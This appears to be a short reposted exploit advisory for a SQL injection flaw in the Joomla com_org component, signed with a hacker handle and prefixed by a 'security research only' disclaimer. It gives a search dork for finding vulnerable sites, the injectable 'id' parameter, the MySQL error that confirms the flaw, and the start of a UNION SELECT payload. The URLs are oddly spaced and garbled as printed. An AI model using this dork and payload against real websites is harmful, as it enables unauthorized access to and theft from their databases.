Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! ######################################## #######################################
####
# Joomla com_org SQL Injection Vulnerability ##
####
######################################## #######################################
\ N2n-Hacker-2nd@live.fr //////////////////////// ////
**************************************** ***************************************
=> Dork = inurl: "option = com_org"
-------------------------------------------------------------------------------
# EXp: http://www.website.com/path/index.php? Option = com_org & task = info & id = 22 <= [SQLI] -- & lang = en
Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
# Http://www.website.com/path/index.php? Option = com_org & task = info & id =-22 union select 1, 2... -- & lang = en
**************************************** ****************************************
\\\\\\\\\ Bad life //////////////////
**************************************** **************************************** //